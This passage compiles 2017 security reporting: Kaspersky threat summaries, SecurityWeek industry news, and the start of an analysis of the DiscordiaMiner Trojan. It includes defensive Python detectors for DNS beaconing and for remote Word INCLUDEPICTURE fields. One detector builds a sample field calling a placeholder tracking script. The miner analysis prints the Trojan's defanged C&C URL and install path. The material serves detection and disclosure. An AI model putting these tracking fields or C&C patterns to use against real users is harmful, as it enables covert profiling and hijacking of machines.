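2017-07-18T12:30:02Z 10.1.4.23 TXT _dmarc.example.com
"""

Row = Tuple[datetime, str, str, str]


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded host/user data scores far higher than real hostnames."""
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text: str) -> List[Row]:
    rows = []
    for line in text.splitlines():
        ts, client, qtype, qname = line.split()
        stamp = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        rows.append((stamp, client, qtype.upper(), qname.lower().rstrip(".")))
    return rows


def looks_encoded(label: str, min_len: int = 16, min_entropy: float = 3.5) -> bool:
    """Assumed thresholds: long, high-entropy leftmost labels are the data-carrying ones."""
    return len(label) >= min_len and shannon_entropy(label) >= min_entropy


def find_beacons(rows: List[Row], min_queries: int = 3, max_jitter: float = 0.1) -> List[dict]:
    """Group suspicious TXT queries per (client, registered domain) and flag groups
    whose inter-query gaps all lie within max_jitter of their mean."""
    by_key: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for stamp, client, qtype, qname in rows:
        labels = qname.split(".")
        if qtype != "TXT" or len(labels) < 3 or not looks_encoded(labels[0]):
            continue
        by_key[(client, ".".join(labels[-2:]))].append(stamp)

    hits = []
    for (client, domain), stamps in by_key.items():
        if len(stamps) < min_queries:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = sum(gaps) / len(gaps)
        spread = max(abs(g - mean) for g in gaps) / mean
        if spread <= max_jitter:
            hits.append({"client": client, "domain": domain,
                         "queries": len(stamps), "interval_hours": round(mean / 3600, 2)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{hit['client']} -> {hit['domain']}: {hit['queries']} TXT queries "
              f"every ~{hit['interval_hours']} h")
```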

You can read more about ShadowPad here.

Another supply-chain attack occurred in September, when attackers compromised an update to the Windows clean-up utility CCleaner, published by Avast. Researchers at Cisco Systems Talos Group discovered that attackers had modified the installer for CCleaner 5.3 to drop their malware on the computers of anyone who downloaded the utility. The malware, which was signed with a valid certificate, was active for a month and infected around 700,000 computers. The attackers used a two-stage infection process. The first delivered a profile of the victim to the attackers’ C2 servers, while the second was reserved for specific targets. You can find details of the analysis here.

It is sometimes tempting for companies to imagine that no one would want to target them – perhaps because they are not a large company, or because they do not believe that they have anything of significance to an attacker. However, even quite apart from their intellectual property, or personal information belonging to customers, they can be valuable as a stepping-stone into another organisation.

The bear facts
In August, we provided an update on an interesting APT that we call ‘WhiteBear’, related to the Turla group. Like Turla, WhiteBear uses compromised web sites and hijacked satellite connections for its C2 infrastructure. The project also overlaps with other Turla campaigns such as ‘Skipper Turla’ (or ‘WhiteAtlas’) and ‘Kopiluwak’ (both of which we detailed for subscribers to Kaspersky APT intelligence reports). In addition, we have found WhiteBear components on a subset of systems that were previously targeted by WhiteAtlas, with the same file-paths and identical filenames. Nevertheless, we have been unable to firmly tie the delivery of WhiteBear to any specific WhiteAtlas components, and we believe that WhiteBear is the product of a separate development effort and has a distinct focus.

For much of 2016, WhiteBear activity was narrowly focused on embassies and consulates around the world – all related to diplomatic and foreign affairs organisations. This shifted in mid-2017 to include defence-related organizations.

Although we’re not sure of the delivery vector for WhiteBear components, we strongly suspect that the group sends spear-phishing e-mails to its targets containing malicious PDF files.

The encryption implemented in the main module, the WhiteBear orchestrator, is particularly interesting. The attackers encrypt/decrypt, and pack/decompress the resource section with RSA+3DES+BZIP2. This implementation is unique and includes the format of the private key as stored in the resource section. 3DES is also present in Sofacy and Duqu 2.0 components, but those components lack this Microsoft-centric RSA encryption technique. The private key format used in this schema and the RSA crypto combination with 3DES is (currently) unique to this group.

Most WhiteBear samples are signed with a valid code-signing certificate issued for ‘Solid Loop Ltd’, a once-registered British organization. This is probably a front organization or a defunct organization; and the attackers have assumed its identity to abuse the name and trust, in order to create deceptive digital certificates.

You can find full technical details of WhiteBear here.

(Un)documented Word feature abused by hackers
If a targeted attack is to be successful, the attackers must first gather intelligence on their prospective victims. In particular, they need details about the operating system and key applications, so that they can deliver the appropriate exploit.

During an investigation of a targeted attack, we found some spear-phishing e-mails with interesting Word documents attached to them. At first sight, they seemed unremarkable: they contained no macros, exploits or other active content.

However, on closer inspection, we found that they contained several links to PHP scripts located on third-party web resources. When we attempted to open these files in Microsoft Word, we found that the application addressed one of the links and, as a result, provided the attackers with information about software installed on the target computer. The documents were in OLE 2 (Object Linking and Embedding) format. OLE allows authors to embed objects and link to multiple objects or resources in a single Word document. For example, an author can create a field in a document that points to a graphic file, rather than simply embedding the graphic file.

We found a field in the document called ‘INCLUDEPICTURE’. The link to the image in this field should be in ASCII, but in this case, it was in Unicode. Microsoft documentation provides virtually no information about this field. However, the attackers manipulated the Unicode framework to trigger a GET request to malicious and obfuscated URLs contained in the underlying code of the Word document. These links then point to PHP scripts located on third-party web sites, enabling the attackers to gather information about the software installed on the computer.

This feature is not only present in Word for Windows, but also in Microsoft Office for iOS and in Microsoft Office for Android.
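A defender triaging such attachments can look for the same artefact the investigation describes: an INCLUDEPICTURE field whose argument is an external URL, stored as Unicode text rather than ASCII. The following is an added example, not Kaspersky's code: it scans the raw bytes of a document for the field code in both 8-bit and UTF-16LE form and flags network targets. The sample blob is constructed (not a real file), and the field-begin/separator/end control characters 0x13/0x14/0x15 follow the Word binary format.

```python
"""Scan raw Word binary document bytes for INCLUDEPICTURE field codes whose argument is
an external URL, and record whether the field text is stored as 8-bit text or as UTF-16LE
(the "Unicode" variant the investigation describes)."""
import re
from dataclasses import dataclass
from typing import Iterator, List, Tuple
from urllib.parse import urlparse

# Field-code grammar, loosely: INCLUDEPICTURE <ws> ("quoted target" | bare-target) [\switches]
_FIELD_RE = re.compile(r'INCLUDEPICTURE\s+(?:"([^"\r\n]*)"|(\S+))', re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    encoding: str   # "ascii" (8-bit text) or "utf-16le"
    target: str     # the field argument as written in the document
    external: bool  # True when Word would fetch it over the network (http/https)


def _decodings(data: bytes) -> Iterator[Tuple[str, str]]:
    """Yield text views of the blob: 8-bit text, plus UTF-16LE at both byte alignments,
    because a 16-bit text piece need not start on an even file offset."""
    yield "ascii", data.decode("latin-1")
    for offset in (0, 1):
        chunk = data[offset:]
        if len(chunk) % 2:
            chunk = chunk[:-1]
        yield "utf-16le", chunk.decode("utf-16-le", errors="replace")


def find_includepicture_targets(data: bytes) -> List[Finding]:
    findings: List[Finding] = []
    seen = set()
    for label, text in _decodings(data):
        for m in _FIELD_RE.finditer(text):
            target = (m.group(1) or m.group(2)).strip()
            if (label, target) in seen:
                continue
            seen.add((label, target))
            scheme = urlparse(target).scheme.lower()
            findings.append(Finding(label, target, scheme in ("http", "https")))
    return findings


def suspicious(findings: List[Finding]) -> List[Finding]:
    """The pattern from the investigation: a picture field that reaches out to an
    external server (a PHP script in the reported case) when the document is opened."""
    return [f for f in findings if f.external]


def _sample_document() -> bytes:
    """Constructed stand-in for a WordDocument text stream: a benign 8-bit field,
    some padding, then the same field stored as UTF-16LE pointing at a placeholder
    third-party script (hostname is an assumption, not a real indicator)."""
    benign = b'Quarterly report \x13 INCLUDEPICTURE "logo.png" \\d \x14\x15 text'
    hidden = ('\x13 INCLUDEPICTURE "http://third-party.example/track.php" \\d \x14\x15'
              ).encode("utf-16-le")
    return benign + b"\x00" * 7 + hidden + b"\x00" * 4


if __name__ == "__main__":
    for f in find_includepicture_targets(_sample_document()):
        flag = "EXTERNAL" if f.external else "local"
        print(f"[{f.encoding}] {flag}: {f.target}")
```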

You can read further details about our investigation here.

Information security incidents and how to respond to them
Our growing dependence on technology, connectivity and data means that businesses present a bigger attack surface than ever. Targeted attackers have become more adept at exploiting their victims’ vulnerabilities to penetrate corporate defences while ‘flying under the radar’. Unfortunately, corporate information security services are often unprepared. Their employees underestimate the speed, secrecy and efficiency of modern cyber-attacks and businesses often fail to recognize how ineffective the old approaches to security are. Even where companies supplement traditional prevention tools such as anti-malware products, IDS/IPS and security scanners with detection solutions such as SIEM and anti-APT, they may not be used to their full potential.

You can’t manage what you can’t measure. One of the key factors in responding effectively to a targeted attack is to understand the nature of the incident.

In August, our incident response team used the example of a bank attack to present the key stages of a targeted attack (known as the kill chain) and the steps required for an effective incident response process. You can read the report here, but the following is a summary of the key elements.

The basic principles of a successful targeted attack include thorough preparation and a step-by-step strategy. The stages of the kill chain are:

RECONNAISSANCE (learning about the target)
WEAPONISATION (choosing the method of attack)
DELIVERY (deciding on the attack vector)
EXPLOITATION (exploiting a vulnerability to gain an initial foothold)
INSTALLATION (installing the malware)
COMMAND-AND-CONTROL (connecting to the attackers’ server for further instructions)
ACTIONS ON OBJECTIVE (achieving the attackers’ goals)

The basic principles behind the work of information security staff are the same as the attackers – careful preparation and a step-by-step strategy. The objectives, of course, are fundamentally different: to prevent incidents and, if one occurs, to restore the initial state of the system as soon as possible.

There are two main stages involved in responding to a specific incident: investigation and system restoration. The investigation must determine:

The initial attack vector
The malware, exploits and other tools used by the attackers
The target of the attack (affected networks, systems and data)
The extent of the damage (including reputational damage) to the organisation
The stage of the attack (whether or not it was completed and the attackers’ goals were achieved)
Timeframes (when the attack started and ended, when it was detected and the response time of the information security service)

Once the investigation has been completed, it is necessary to use the information learned to create a system recovery plan or, if one exists, to assess how it can be improved.

The overall strategy includes the following steps.

PREPARATION (develop the tools, policies and processes needed to defend the organisation)
IDENTIFICATION (decide if an incident has occurred by identifying pre-defined triggers)
CONTAINMENT (limit the scope of the incident and maintain business continuity)
ERADICATION (restore the system to its pre-incident state)
RECOVERY (re-connect the affected systems to the wider network)
LESSONS LEARNED (how well did the information security team deal with the incident and what changes need to be made to the strategy)

In the event of the information security team having to respond to multiple incidents simultaneously, it’s important to correctly set priorities and focus on the main threats. The key factors involved in determining the severity of an incident include:

The network segment where the compromised computer is located
The value of the data stored on that computer
The type and number of incidents that affect the same computer
The reliability of the IoCs (Indicators of Compromise) for this incident

The choice of computer, server or network segment to deal with first will depend on the specific nature of the organisation.

Malware stories
The hidden advertising threat
As well as banking Trojans, ransomware and other threats that can clearly be defined as malware, people also face numerous borderline programs – including advertising bots and modules, and partnership programs – which are typically referred to as ‘potentially unwanted programs’. They are borderline because there is sometimes a fine line between classifying something as an outright Trojan or adware. One such program is Magala, a Trojan-Clicker.

Such programs imitate a user click on a particular web page, thus boosting advertisement click counts. Magala doesn’t actually affect the person whose computer it is installed on, other than consuming some of their computer’s resources. The victims are those who pay for the advertising – typically small business owners doing business with unscrupulous advertisers.

The first stage of the infection involves the Trojan checking which version of Internet Explorer is installed and locating it in the system. The Trojan doesn’t run if it’s version 8 or earlier. Otherwise, it initialises a virtual desktop, used to perform all subsequent activities. Then it runs a sequence of utility operations (typical for this type of malware): it sets up autorun, sends a report to a hardcoded URL, and installs the required adware. To interact with the content of an open page, Magala uses IHTMLDocument2, the standard Windows interface that makes it easy to work with the DOM tree. The Trojan uses it to load the MapsGalaxy Toolbar, installs this on the system and adds the site ‘hxxp://hp.myway.com’ to the system registry, associating it with MapsGalaxy so that it becomes the browser’s home page.

The Trojan then contacts the remote server and requests a list of search queries for the click counts that it needs to boost. The server returns this list in plain text. Magala uses the list to send the requested search queries and clicks on each of the first 10 links in the search results, with an interval of 10 seconds between each click.

The average cost per click in a campaign of this sort is $0.07. So a botnet consisting of 1,000 infected computers clicking 10 web site addresses from each search result, performing 500 search requests with no overlaps in the search results, could earn the cybercriminals up to $350 from each infected computer. However, this is just an estimate as the costs can vary greatly in each situation.

Statistics from March to early June 2017 indicate that most Magala infections occur in the United States and Germany.

This class of program typically doesn’t present as much of a threat to consumers as, for example, banking Trojans or ransomware. However, two things make it tricky to deal with. First, such programs straddle the borderline between legitimate and malicious software and it’s vital to determine whether a specific program is part of a secure and legal advertising campaign or if it’s illegitimate software making use of similar functions. Second, the sheer quantity of such programs means that we need to use a fundamentally different approach to analysis.

You can read more about Magala here.

It started with a link
Cybercriminals are constantly on the lookout for ways of luring unsuspecting victims into doing things that compromise their security and capture personal data. In August, David Jacoby from Kaspersky Lab and Frans Rosen from Detectify teamed up to expose one such campaign that used Facebook Messenger to infect people.

It started with a link to a YouTube video. The cybercriminals behind the scam used social engineering to trick their victims into clicking on it: the message contained the recipient’s first name, plus the word ‘Video’ – for example ‘David Video’ – and then a bit.ly link.

This link pointed to Google Drive, where the victim would see what looks like a playable movie, with a picture of them in the background and what seems to be a ‘Play’ button.

If the victim tried to play the video in the Chrome browser, they were redirected to what looked like a YouTube video and were prompted to install a Chrome extension – in fact, this was the malware. The malware waited for the victim to sign in to their Facebook account and stole their login credentials. It also captured information about their Facebook contacts and sent malicious links to their friends – so spreading the infection further.

Anyone using a different extension was nagged into updating their Adobe Flash Player instead – but the file they downloaded was adware, earning money for the cybercriminals through advertising.

This attack relied heavily on realistic social interactions, dynamic user content and legitimate domains as middle steps. The core infection point of the spreading mechanism was the installation of a Chrome Extension. It’s really important to be careful about allowing extensions to control your browser interactions and also to make sure that you know exactly what extensions you are running in your browser. In Chrome, you can type ‘chrome://extensions/’ into the address field of your browser to get a list of enabled extensions. On top of this, of course, be wary about clicking on links. If you’re in any doubt about whether it’s legitimate or not, contact the sender to check if it was really them who sent it.

Undermining your security
We have seen a substantial growth in crypto-currency miners this year. In 2013, our products blocked attempts to install miners on the computers of 205,000 people protected by Kaspersky Lab products. In 2014, this increased to 701,000. In the first eight months of 2017, this increased to 1.65 million.

Crypto-currency mining is not illegal. However, there are groups of people who trick unwitting people into installing mining software on their computers, or exploit software vulnerabilities to do so. The criminals obtain crypto-currency, while the computers of their victims slow down. We have recently detected several large botnets designed to profit from concealed crypto mining. We have also seen growing numbers of attempts to install miners on servers owned by organizations. When these attempts are successful, the business processes of the target organisations suffer because data processing speeds fall substantially.

The main method used to install miners is adware installers spread using social engineering. There are also more sophisticated propagation methods – one is using the EternalBlue exploit published in April 2017 by the Shadow Brokers group. In this case, the cybercriminals tend to target servers – these provide them with a more powerful asset.

We recently detected a network made up of an estimated 5,000 plus computers on which Minergate, a legal console miner, had been installed without the knowledge or consent of the victims. The victims had downloaded the installer from a file-hosting service, under the guise of a freeware program or keys to activate licensed products. This installer downloaded the miner’s dropper file to their computer. The dropper installed the Minergate software on the computer, ensuring that it is loaded each time the computer boots and re-installing it if it is deleted.

Often, crypto-miners come with extra services to maintain their presence in the system, launch automatically every time the computer boots and conceal their operation. Such services could, for example, try to turn off security software, monitor system activities or ensure that the mining software is always present by restoring it if the files are deleted.

Concealed miners are very difficult to detect because of their specific nature and operating principles. Anyone can choose to install this kind of software and legally use it to mine a crypto-currency.

Monero (XMR) and Zcash are the two currencies most often used in concealed mining. They both ensure the anonymity of transactions – this is clearly very useful for cybercriminals. Even according to conservative estimates, a mining network can generate up to $30,000 per month for its owners.

The above image shows a wallet coded into the miner’s configuration data. At the time of writing, 2,289 XMR had been transferred from this wallet, which at the current exchange rate is equivalent to $208,299.

You can read more here.

Connected hospitals
Technology now reaches into more parts of society than ever before. As a result, organisations that previously didn’t need to think about cyber-security now face cyber-attacks. One example of this is the healthcare industry. Medical information that has traditionally existed in paper form is now to be found in databases, portals and medical equipment.

Data security in medicine is more serious than it seems at first glance. The obvious issue might be the theft and resale of medical data on the black market. However, the possibility of diagnostic data being modified by attackers is even more alarming. Regardless of the goals of the attackers (extortion or attacks targeted at specific patients), there’s a serious risk to patients: after receiving incorrect data, doctors may prescribe the wrong course of treatment. Even if the attempt to substitute data is detected in time, the normal operation of the medical facility may be disrupted, prompting the need to verify all of the information stored on compromised equipment. According to a report by the Centers for Disease Control and Prevention (CDC), the third leading cause of death in the United States comes from medical errors. Establishing a correct diagnosis depends not only on the knowledge and skill of a doctor, but on the correctness of data received from medical devices and stored on medical servers. This makes the resources for connected medicine a more attractive target for attackers. Unfortunately, in some cases, the security of the network infrastructure of healthcare facilities is neglected, and resources that process medical information are accessible from outside sources.

The term ‘connected medicine’ refers to a large number of workstations, servers, and dedicated medical equipment that are connected to the network of a medical institution (a simplified model is shown in the figure below).

Diagnostic devices can be connected to the LAN of an organization or to workstations – for example, through a USB connection. Medical equipment quite often processes data (for example, a patient’s photographs) in DICOM format, an industry standard for images and documents. In order to store them and provide access to them from outside, PACS (Picture Archiving and Communication Systems) are used, which can also be of interest to cybercriminals.

We have put together some recommendations for securing medical facilities. You can find the details here, but the following is a summary of the key points:

Prevent public access to all nodes that process medical data
Assign counter-intuitive names to resources
Periodically update installed software and remove unwanted applications
Don’t connect expensive equipment to the main LAN
Ensure timely detection of malicious activity on the LAN

Automotive Cybersecurity Firm Argus Acquired by Continental
10.11.2017 securityweek  Cyber
Argus Cyber Security, a Tel Aviv, Israel-based startup focused on automotive cyber security, has been acquired by Continental subsidiary Elektrobit (EB), which provides embedded software solutions to the automotive industry.

Terms of the acquisition were not disclosed, but some reports have the deal estimated to be in the range of $450 million.

Founded in 2013, Argus offers a modular suite designed to protect cars from hacks. Offerings include an Intrusion Prevention System (IPS) that leverages Deep Packet Inspection (DPI) algorithms to help prevent a vehicle's critical components from being hacked, which the company says can be integrated into any vehicle production line.

The Argus IPS also generates reports and alerts for remote monitoring of a vehicle's cyber health, the company said.

The company has more than 70 employees and 38 granted and pending patents.

As part of EB, the company will continue to engage in commercial relations with all automotive suppliers globally. “This combination of Continental’s broad automotive know-how, Argus’ technology, market-ready solutions and expertise in automotive cyber security, and EB’s deep automotive software knowledge, marks a unique cooperation in the automotive industry,” the company said.

Cyber threats to automotive systems are not necessarily new, but are becoming more of an issue as cars become connected to the Internet and to other devices such as smartphones, smart keys, diagnostic tools and other vehicles.

A number of security researchers have demonstrated the ability to hack into modern vehicles to manipulate steering, acceleration, speedometers and safety sensors, sparking concerns that malicious attackers could use similar techniques to compromise a vehicle's Electronic Control Units (ECUs), allowing manipulation of a car's engine, brakes, airbags and other safety systems or vehicle components.

Quantum Dawn War Games Test Cyber Resiliency in Finance Sector
10.11.2017 securityweek  Cyber
Quantum Dawn IV, a large-scale exercise to test the cyber resiliency of the U.S. finance sector, was held on Tuesday and Wednesday this week. The exercise had more than 900 participants from over 50 financial institutions, government agencies and regulators.

Run by SIFMA (the Securities Industry and Financial Markets Association), Quantum Dawn is designed to test this industry's ability to weather a major cyber attack. SIFMA describes itself as the voice of the U.S. securities industry, representing broker-dealers, banks and asset managers.

"There is likely no greater threat to financial stability than a large-scale cyber event, which SIFMA considers a low-probability, high-impact event that the industry must prepare for along with other possible crisis events," explains Kenneth Bentsen, SIFMA president and CEO.

The exercise, he said, enabled financial institutions, key government agencies and other industry partners to practice communication and response processes to maintain smooth financial market operations in the event of a sector-wide attack. The outcome of the exercise, however, will not be known until the Deloitte Risk and Financial Advisory Cyber Risk Services analyzes the data and produces a 'public after-action' report with observations and recommendations over the next few weeks.

In the meantime, we just have Bentsen's comment, "A clear takeaway from the exercise is the importance of a robust partnership between the industry and government grounded in information sharing. No single actor -- not the federal government, nor any individual firm -- has the resources to protect markets from cyber threats on their own."

The value of such exercises is rarely questioned.

"Any exercise of this nature is always a good idea. Financial Services are part of critical infrastructure and we know they are under sustained and increasing attacks," Neira Jones told SecurityWeek. "Destabilization of financial markets is definitely not something we want to see happen (well, not caused by cybercrime where we could potentially help it/minimize it anyway)," she said.

Jones is a non-executive director at Cognosec, chairs the advisory board for Ensygnia, and spent four years on the PCI SSC Board of Advisers. She has also worked for Barclaycard, Santander, Abbey National, Oracle Corp. and Unisys.

"While financial services are heavily regulated (in security, too), regulations are always some steps behind technology and criminals," she added. "Quantum Dawn is essentially good practice because it is merely testing an incident response plan through simulation, which should be standard practice anyway. It doesn't detract from individual bank testing of their own incident response processes -- which does happen in the great majority, and certainly for the major banks and FS firms."

Quantum Dawn is similar to Waking Shark in the UK. "The trick of course," Jones told SecurityWeek, "will be to act on the lessons learned and for the results not to be confined to the archives. Only time will tell."

That is certainly the hope of Bentsen. "Cybersecurity is truly an issue where the interests of the industry and public sector are fully aligned. SIFMA and our members are constantly working to improve cyber defenses, resiliency and recovery through massive monetary investment in technology and personnel, regular training, industry exercises, and close coordination between the financial sector and the government, including our regulators. Best practices are developed and refined regarding penetration testing, insider threats, third-party risks, and secure data storage and recovery. Lessons learned from Quantum Dawn IV will help shape these initiatives as we constantly work to get better."

Quantum Dawn IV leveraged NUARI (Norwich University Applied Research Institutes), and its latest version of the DECIDE FS, and the SimSpace Corporation’s Cyber Range software for the simulation and execution of the exercise.

In 2013, U.S. banks suffered a series of disruptive DDoS attacks from a group that called itself the Izz ad-Din al-Qassam Cyber Fighters. Growing concern about both nation-state and organized criminal attacks of increasing sophistication against the critical infrastructure makes exercises like Quantum Dawn essential.

New York State Proposes Stricter Data Protection Laws Post Equifax
4.11.2017 securityweek Cyber
New York State Attorney General Eric T. Schneiderman introduced new legislation Thursday, designed to protect New Yorkers from corporate data breaches like the recent Equifax breach that affected more than 145 million Americans, including 8 million New York residents. Its purpose is to increase the security of private information in a business-friendly manner.

Called the Stop Hacks and Improve Electronic Data Security Act (SHIELD Act), it was introduced by Schneiderman as a program bill, and is sponsored by Senator David Carlucci and Assemblymember Brian Kavanagh. "It's clear that New York's data security laws are weak and outdated. The SHIELD Act would help ensure these hacks never happen in the first place. It's time for Albany to act, so that no more New Yorkers are needlessly victimized by weak data security measures and criminal hackers who are constantly on the prowl," said Schneiderman.

It is worth noting that Schneiderman's SHIELD Act is not the same as Senator Markey's proposed Cyber Shield Act. A draft of Markey's bill coincidentally became available last week. While Markey's proposal is to bake security into IoT devices, Schneiderman's proposal is to bring security to businesses through reasonable security safeguards, with new controls over breach disclosure backed by financial sanctions.

Under current New York law, companies can compile personally identifiable information (PII), but are not required to meet any data security requirements if that PII does not include a social security number -- for example, the current law does not require companies to report data breaches of username-and-password combinations, or biometric data like the fingerprint used to unlock an iPhone. The changes will be achieved through amendments to the existing General Business Law and the State Technology Law.

The SHIELD Act requires businesses to adopt "reasonable" administrative, technical, and physical safeguards for sensitive data. Its scope covers any business that holds New Yorkers' sensitive data, not only those that conduct business within New York. It expands the types of data that trigger reporting requirements to include username-and-password combinations, biometric data, and HIPAA-covered health data.

Penalties for violations are increased: the Act allows the attorney general to seek civil penalties and injunctions if businesses do not provide adequate security for PII. These can be $5,000 for each violation, or up to $20 for each instance of failed notification (up to a total of $250,000).

Schneiderman's aim is to protect New Yorkers' personal data just as the European General Data Protection Regulation (GDPR) seeks to protect Europeans' personal information. Schneiderman, however, tries to be more business-friendly. Firstly, the penalties are much lower. Secondly, the required breach disclosure timeline is more flexible: "The disclosure shall be made in the most expedient time possible and without unreasonable delay, consistent with the legitimate needs of law enforcement..."

Thirdly, there is an explicit encryption exemption. Information is classified as PII only "when either the personal information or the data element is not encrypted or encrypted with an encryption key that has also been ACCESSED OR acquired."

Fourthly, it provides a safe harbor against attorney general enforcement for companies already compliant with the NYS DFS, Gramm-Leach-Bliley, and HIPAA regulations; and those with independent certification of compliance with ISO and NIST standards. And fifthly, it provides a flexible approach for small businesses provided they "implement and maintain reasonable safeguards that are appropriate to the size and complexity of the small business."

David Zetoony, the leader of Bryan Cave's consumer protection practice, commented, "Providing a safe harbor for companies that go above-and-beyond to certify good data security is innovative, unique, and friendly to business. It rewards businesses that go the extra mile to audit and verify compliance with an industry data security practice, removing the costs and unpredictability of government litigation. It also does not penalize smaller businesses that have good security practices, but cannot afford the significant cost of annual data security audits and certifications. This is the type of thought leadership needed to improve data security legislation across the country."

Despite these exemptions and flexibility, the SHIELD Act will enforce stronger personal data protection than has so far been required outside of the regulated New York financial institutions. The definition of a data breach is broadened to include an unauthorized person gaining access to information, and the reach of the law is widened from companies that do business in New York to companies that hold personal information of New Yorkers.

"While the federal government drags their feet we must act to protect New Yorkers. The SHIELD Act will serve as a blueprint for NY and the rest of the nation to follow to keep Americans safe," said co-sponsor Senator David Carlucci.

Tech Investor VT Partners Aims to Fuel Cybersecurity Firms in Europe
2.11.2017 securityweek Cyber
Newly Formed VT Partners Seeks to Combine International Finance, American Adventure, and European Innovation

A recently formed venture capital investment firm aims to fund European technology companies and seed a new entrepreneurial approach to cybersecurity businesses in Europe. Formed earlier this year and now partnered with cybersecurity investment specialist Paladin Capital Group, VT Partners came out of the shadows last week.

VT Partners is a European B2B growth capital firm, founded by ex-Carlyle Group director Nazo Moosa and former GMT Partners senior partner Natalie Tydeman. The collaboration with Paladin is designed to provide high-potential technology companies -- whether early-stage companies or more established technology SMEs -- with a one-stop platform for their funding needs. Moosa becomes Paladin's new Senior Strategic Partner Europe.

Venture capital in cybersecurity is not without its critics. It has been claimed, for example, that it can promote products beyond their actual worth. While accepting that "venture capital gave birth to many great security companies that would otherwise unavoidably fail," High-Tech Bridge CEO Ilia Kolochenko believes that the relative stability of the cybersecurity market during a period of great economic instability has attracted investors with little or no knowledge of security.

"Genuine venture capital," he says, "is not just about cash, but about the tangible help and practical support it can provide to skyrocket the business. Very few VCs really do this -- many just create an active semblance of coaching and support that rather hinders the business. Cybersecurity startups should be very careful when they select a VC, and keep in mind that this step is quintessential for their success or failure."

VT Partners would probably agree with this assessment. It focuses on cybersecurity, artificial intelligence, and critical industries. Paladin is also cybersecurity-centric, with existing successful investments in PhishMe, Digital Shadows, Anomali, Endgame and Panaseer.

"We think that being a generalist in technology is a mug's game," Moosa told SecurityWeek. "It's difficult to invest in the more dynamic sections of technology when you are pursuing a generalist strategy. Cybersecurity is a very good example of that -- it's complex and frequently changing, there's a lot of vendor churn -- and the only way to get smart about the industry is to narrow your focus and spend a lot of time and resources getting to know that industry. Paladin has been doing just that for the last 16 years."

The reality, however, is that despite similar populations, the U.S. has five times the venture funding of Europe -- and there are reasons for this. "Europe is not short of ideas," said Moosa. Think of the God Particle, graphene, public key encryption and the world wide web itself. "But the U.S. has more than just capital, it also has a well-established entrepreneurial infrastructure." This is what is lacking in Europe. "There's not just a dearth of capital, there's a dearth of certain skills in Europe."

Moosa sees the biggest problem for European companies in turning a differentiated product into a market success as a lack of entrepreneurial expertise in product management and marketing. Reflecting Kolochenko's view of what makes good venture capital, she sees her role as not just providing capital, but helping clients find the right people to ensure success. "We've seen a real excitement around emerging technologies," she said, "particularly in artificial intelligence, machine learning and data analytics where Europe is leading. But many European businesses do not have access to the appropriate levels of capital and mentorship required to place their business onto a global stage."

To provide the mentorship, she is turning to the entrepreneurial talent pool in the U.S., and especially in Silicon Valley. "I try to bring back certain ex-pats who have successfully moved to the US -- sometimes I'm successful, sometimes I'm not. Our collaboration with Paladin in this area is valuable because they have a very strong US cybersecurity market and we tap into that -- but ultimately it's really about knowing the individuals who are strong in these areas -- some are coming out of the companies we invested in ten or 15 years ago -- and bringing those into the organizations we invest in. But I do believe that there is a real gap in Europe that needs to be filled if you want to take a product beyond the early stage. The only way to really be able to do that is to work very closely with management teams -- management still runs the business, but we try to complement them and fill in the gaps with both temporary and long-term solutions."

The time is ripe for European venture capital. Moosa acknowledges some of the criticism of VC in the U.S. "We are possibly at the peak of the current market -- you could argue that markets peak every seven or 8 years; and we're in year 8 or 9 in the current sequence. Such criticism is often made at this stage, and sometimes legitimately: that there is more money going in, and that there's more venture capital than intellectual capital in some of the new companies. But I've seen two great peaks in 2000 and now in 2007, so criticism might simply reflect where we are in the market right now; but the point that I would bring us back to is that Europe is very, very different."

If Moosa succeeds, she will bring a combination of international finance and Silicon Valley energy to an underdeveloped but innovative European cybersecurity space. She acknowledges that some of these companies might achieve some success and then up sticks and move to America -- if only because many of the early adopters of new technology are American. In her heart, however, she wants to be a part of developing a new and vibrant European cybersecurity industry that will remain very much European.

Tales from the blockchain
2.11.2017 Kaspersky Cyber

Cryptocurrency has gradually evolved from an element of a new, utopian economy into a business that has affected even those sectors of society least involved in information technology. At the same time, it has acquired a fair number of “undesirable” supporters who aim to enrich themselves at the expense of other users: attackers who embed miners in JavaScript served to users, who plan to build miners into IoT devices at the production stage, or who hide miners in countless Trojan variants paired with SMB exploits, and so on.

We will tell you two unusual success stories from the “miner front”. The first echoes the TinyNuke event and, in many respects, gives an idea of the current situation with miners. The second proves that to get cryptocurrency, you don’t need to “burn” the processor.

DiscordiaMiner and fights on forums
In early June, our analysts found a new and seemingly unremarkable Trojan that downloaded a miner for the popular Monero cryptocurrency. However, in the course of further research, we uncovered many interesting details that we would like to share with you.

Kaspersky Lab products detect this Trojan as Trojan.Win32.DiscordiaMiner. It works as follows:

Creates a number of directories in the system to download the necessary files;
Copies itself to C:\ProgramData\MicrosoftCorporation\Windows\SystemData\Isass.exe;
Gets the update from the server;
Creates an autorun task;
Gets the miner files;
Gets the credentials of the user in whose name it wants to run the mining;
Starts the miner.

All interaction with the command-and-control (C&C) server occurs in the clear, via GET requests, without any check or verification. In all samples, hxxp://api[.]boosting[.]online is the C&C address. The string associated with the individual user (e.g. MTn31JMWIT) and the path of the requested resource – the file list, the update, etc. – are appended to the server address. Example: hxxp://api[.]boosting[.]online/MTn31JMWIT/getDiscordia

Discord on the forum
As mentioned above, at a certain point in its work the Trojan runs the miner with a command line that specifies the email of the user who has “done the job”. It looks like this:

-user <user_email> -xmr

Searching for the value of the <user_email> argument, the first search result is the Trojan-related topic on a Russian-language forum:

On this forum thread there is a wide-ranging discussion of the details of the Trojan’s operation. The most interesting part is on page 21, where the forum participants accuse the Trojan’s author of substituting users’ addresses with his own. Among other things, there is also a dialogue on the chat app Telegram, where the author explains this substitution as a banal mistake.

On the forum, the author of DiscordiaMiner references the short lifespan of this error as an argument in his defense:

